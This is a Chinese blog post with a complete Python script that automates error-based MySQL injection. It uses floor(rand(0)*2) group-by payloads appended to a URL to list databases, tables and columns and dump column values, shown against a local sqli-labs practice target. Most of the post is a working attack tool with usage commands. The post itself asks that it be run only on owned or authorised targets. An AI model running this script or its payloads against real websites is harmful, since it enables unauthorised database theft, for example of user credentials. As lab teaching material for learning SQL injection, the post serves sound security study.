Python 脚本：MySQL 报错注入（error-based SQL injection）自动查询

2018-06-08  sky枫

这里我用的是 sqli-labs-master 搭建的本地靶场来做实验。脚本会把注入 payload 直接拼到 `-u` 给出的 URL 后面，请只对自己搭建或明确获得授权的目标使用。

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from optparse import OptionParser
import sys
import requests
import re

parser=OptionParser()

parser.add_option("-d", "--database",action="store",type="string",dest="database",help="Please input test database")
parser.add_option("-t", "--table",action="store",type="string",dest="table",help="Please input test table")
parser.add_option("-c", "--column",action="store",type="string",dest="column",help="Please input test column")
parser.add_option("-u", "--url",action="store",type="string",dest="url",help="Please input test url")

(options,args) = parser.parse_args()

#print(options)
#print(args)
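def main():
    """Dispatch to the enumeration step selected by the CLI options.

    ``-u`` is always required. ``-d``, ``-t`` and ``-c`` form a chain: a table
    needs its database, a column needs its table. Each extra level goes one
    step deeper (databases -> tables -> columns -> row values).

    The original only handled the all-options-missing case; any other
    incomplete combination (``-d`` without ``-u``, ``-t`` without ``-d``,
    ``-c`` without ``-t``) fell through and silently did nothing. Those now
    print the help and exit with status 2 (usage error).
    """
    url = options.url
    database = options.database
    table = options.table
    column = options.column

    if url is None and database is None and table is None and column is None:
        # Unchanged behaviour for a bare invocation: help, exit status 0.
        print("Please read the help")
        parser.print_help()
        sys.exit()

    if url is not None and database is None and table is None and column is None:
        getAllDatabases(url)
    elif url is not None and database is not None and table is None and column is None:
        getAllTables(url, database)
    elif url is not None and database is not None and table is not None and column is None:
        getAllColumnByTable(url, table, database)
    elif url is not None and database is not None and table is not None and column is not None:
        getAllContent(url, column, table, database)
    else:
        # Incomplete chain (e.g. -t without -d, or anything without -u).
        print("Please read the help")
        parser.print_help()
        sys.exit(2)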

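def http_get(url, timeout=30):
    """GET ``url`` and return the raw response body.

    Parameters:
        url: full request URL, injection payload already appended.
        timeout: seconds to wait for connect/read. The original passed no
            timeout, so a target that stopped answering hung the whole
            enumeration forever; 30 s keeps the old call signature working.
    Returns:
        The response body as ``bytes``; callers decode it themselves.
    Raises:
        requests.RequestException: on connection failure or timeout.

    Non-2xx responses are deliberately returned as-is: error-based injection
    frequently depends on a 500 page that still echoes the MySQL error text.
    """
    response = requests.get(url, timeout=timeout)
    return response.content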

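def getAllDatabases(url):
    """Enumerate every schema name with error-based (floor(rand(0)*2) / group by) injection.

    Parameters:
        url: injectable URL with the vulnerable parameter last, e.g.
            ``http://127.0.0.1/sqli-labs/Less-2/?id=2``. The payload is
            appended after a single space and no quote is added, so the
            parameter must be injectable in a numeric context.
    Side effects:
        One request for the schema count, then one request per schema; the
        results are printed, not returned.
    Raises:
        RuntimeError: a response carries no ``~...~`` marker (injection not
            firing, MySQL errors not echoed, WAF/redirect). The original
            crashed with ``AttributeError`` on ``None.group`` here.
        ValueError: the captured count is not an integer.

    NOTE(review): the first ``~...~`` pair in the page is taken, so a page
    that contains ``~`` elsewhere before the error text will be misread. MySQL
    also truncates the value shown in the duplicate-entry error (historically
    around 64 chars), so very long names may come back cut short — verify
    against the target.
    """
    # Count and per-row payloads differ only in the selected expression and
    # the LIMIT clause, so they are built from one template. The literal is
    # formatted BEFORE the URL is prepended: a URL containing '%' (e.g. %27)
    # must never reach the % operator (the original's precedence did the same).
    template = (
        " and (select 1 from (select count(*),concat((select concat(0x7e,%s,0x7e)"
        " from information_schema.schemata%s),floor(rand(0)*2))x"
        " from information_schema.tables group by x)a)"
    )
    marker = re.compile(r'~(.*?)~', re.S | re.I)

    def fetch_marked(payload):
        # errors='replace': a non-UTF-8 error page must not abort the run.
        page = http_get(url + payload).decode('utf-8', errors='replace')
        found = marker.search(page)
        if found is None:
            raise RuntimeError("no ~...~ marker in response; injection did not fire for payload: %s" % payload)
        return found.group(1)

    db_nums = int(fetch_marked(template % ("count(schema_name)", "")))
    print("数据库的个数为:%d" % db_nums)
    for x in range(db_nums):
        db_name = fetch_marked(template % ("schema_name", " limit %d,1" % x))
        print("第%d个数据库为:%s" % (x + 1, db_name))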

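def getAllTables(url, database):
    """Enumerate the table names of one schema via error-based injection.

    Parameters:
        url: injectable URL, vulnerable parameter last (see getAllDatabases).
        database: schema name; it is inserted raw between single quotes in the
            payload, so a name containing ``'`` breaks the query.
    Side effects:
        One request for the table count, then one per table; results printed.
    Raises:
        RuntimeError: a response carries no ``~...~`` marker (injection not
            firing, errors not echoed, WAF/redirect) — previously an
            ``AttributeError`` on ``None.group``.
        ValueError: the captured count is not an integer.

    NOTE(review): MySQL truncates the value echoed in the duplicate-entry
    error (historically ~64 chars); long table names may be cut — verify.
    """
    # One template for both payloads; formatted before the URL is prepended so
    # a '%' in the URL never reaches the % operator (same as the original's
    # `url + "..." % x` precedence).
    template = (
        " and (select 1 from (select count(*),concat((select concat(0x7e,%s,0x7e)"
        " from information_schema.tables where table_schema = '%s'%s),floor(rand(0)*2))x"
        " from information_schema.tables group by x)a)"
    )
    marker = re.compile(r'~(.*?)~', re.S | re.I)

    def fetch_marked(payload):
        # errors='replace': a non-UTF-8 error page must not abort the run.
        page = http_get(url + payload).decode('utf-8', errors='replace')
        found = marker.search(page)
        if found is None:
            raise RuntimeError("no ~...~ marker in response; injection did not fire for payload: %s" % payload)
        return found.group(1)

    tab_nums = int(fetch_marked(template % ("count(table_name)", database, "")))
    print("数据表的个数为:%d" % tab_nums)
    for x in range(tab_nums):
        tab_name = fetch_marked(template % ("table_name", database, " limit %d,1" % x))
        print("第%d个数据表为:%s" % (x + 1, tab_name))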

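def getAllColumnByTable(url, table, database):
    """Enumerate the column names of ``database.table`` via error-based injection.

    Parameters:
        url: injectable URL, vulnerable parameter last (see getAllDatabases).
        table: table name, inserted raw between single quotes in the payload.
        database: schema name, likewise inserted raw; a ``'`` in either
            breaks the query.
    Side effects:
        One request for the column count, then one per column; results printed.
    Raises:
        RuntimeError: a response carries no ``~...~`` marker (injection not
            firing, errors not echoed, WAF/redirect) — previously an
            ``AttributeError`` on ``None.group``.
        ValueError: the captured count is not an integer.

    NOTE(review): MySQL truncates the value echoed in the duplicate-entry
    error (historically ~64 chars); long column names may be cut — verify.
    """
    # One template for both payloads; formatted before the URL is prepended so
    # a '%' in the URL never reaches the % operator.
    template = (
        " and (select 1 from (select count(*),concat((select concat(0x7e,%s,0x7e)"
        " from information_schema.columns where table_name = '%s' and table_schema = '%s'%s),floor(rand(0)*2))x"
        " from information_schema.tables group by x)a)"
    )
    marker = re.compile(r'~(.*?)~', re.S | re.I)

    def fetch_marked(payload):
        # The body is bytes; decode with errors='replace' so a non-UTF-8
        # error page cannot abort the run.
        page = http_get(url + payload).decode('utf-8', errors='replace')
        found = marker.search(page)
        if found is None:
            raise RuntimeError("no ~...~ marker in response; injection did not fire for payload: %s" % payload)
        return found.group(1)

    colu_nums = int(fetch_marked(template % ("count(column_name)", table, database, "")))
    print("字段的个数为:%d" % colu_nums)
    for x in range(colu_nums):
        colu_name = fetch_marked(template % ("column_name", table, database, " limit %d,1" % x))
        print("第%d个字段为:%s" % (x + 1, colu_name))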

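def getAllContent(url, column, table, database):
    """Dump every value of ``database.table.column`` via error-based injection.

    Parameters:
        url: injectable URL, vulnerable parameter last (see getAllDatabases).
        column: column name (or any SQL expression) — inserted raw into
            ``count(...)`` / ``(...)``, unquoted.
        table: table name, inserted raw as ``database.table`` (unquoted).
        database: schema name, inserted raw (unquoted).
    Side effects:
        One request for the row count, then one per row; results printed.
    Raises:
        RuntimeError: a response carries no ``~...~`` marker (injection not
            firing, errors not echoed, WAF/redirect, or the selected value is
            NULL so concat() yields no marker) — previously an
            ``AttributeError`` on ``None.group``.
        ValueError: the captured count is not an integer.

    NOTE(review): the count uses ``count(column)``, which skips NULL rows,
    while the loop walks rows with ``limit x,1`` regardless of NULLs; on a
    column containing NULLs the two can disagree (rows skipped or a marker-
    less response). Also, MySQL truncates the value echoed in the
    duplicate-entry error (historically ~64 chars) — verify on the target.
    """
    # One template for both payloads; formatted before the URL is prepended so
    # a '%' in the URL never reaches the % operator. The selected expression
    # differs between the two: count(column) vs (column).
    template = (
        " and (select 1 from (select count(*),concat((select concat(0x7e,%s,0x7e)"
        " from %s.%s%s),floor(rand(0)*2))x"
        " from information_schema.tables group by x)a)"
    )
    marker = re.compile(r'~(.*?)~', re.S | re.I)

    def fetch_marked(payload):
        # errors='replace': a non-UTF-8 page must not abort the run.
        page = http_get(url + payload).decode('utf-8', errors='replace')
        found = marker.search(page)
        if found is None:
            raise RuntimeError("no ~...~ marker in response; injection did not fire for payload: %s" % payload)
        return found.group(1)

    con_nums = int(fetch_marked(template % ("count(%s)" % column, database, table, "")))
    print("字段%s中数据的个数为:%d" % (column, con_nums))
    for x in range(con_nums):
        con_name = fetch_marked(template % ("(%s)" % column, database, table, " limit %d,1" % x))
        print("字段%s的第%d个数据:%s" % (column, x + 1, con_name))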

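if __name__ == '__main__':
    # Commented-out direct calls replaced by the equivalent CLI usage (the
    # script is meant to be driven through ``main`` / the ``-u -d -t -c``
    # options). Against sqli-labs Less-2 the URL must end with the injectable
    # parameter:
    #   python3 this.py -u 'http://127.0.0.1/sqli-labs/Less-2/?id=2'
    #   python3 this.py -u '...?id=2' -d liuyanban
    #   python3 this.py -u '...?id=2' -d liuyanban -t user
    #   python3 this.py -u '...?id=2' -d liuyanban -t user -c username
    # Only run this against targets you own or are authorised to test.
    main()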

这里用到了 optparse、requests、re 三个模块；sys 只用于 sys.exit()，可有可无（也可以改用 raise SystemExit）。
optparse 模块负责解析命令行参数，接收 URL、数据库名、表名、字段名（注意 optparse 自 Python 3.2 起已不再维护，新脚本建议改用 argparse）。
requests 模块在发起 URL 请求时要用到；注意原脚本的 requests.get 没有设置 timeout，目标无响应时脚本会一直挂起，建议加上 timeout 参数。
requests 模块请求方法

HTTP请求类型

requests 模块接收响应内容（response.content，类型是 bytes，所以后面需要 decode）

re 模块是正则表达式模块，用来从 MySQL 的 Duplicate entry 报错信息中取出夹在两个 ~（0x7e）之间的内容：

result = re.search(r'~(.*?)~',html.decode('utf-8'),re.S|re.I)

注意：页面里如果没有出现 ~...~（注入没有生效、报错没有回显、或被 WAF 拦截），re.search 会返回 None，接着的 result.group(1) 就会抛 AttributeError，使用时需要先判断 result 是否为 None。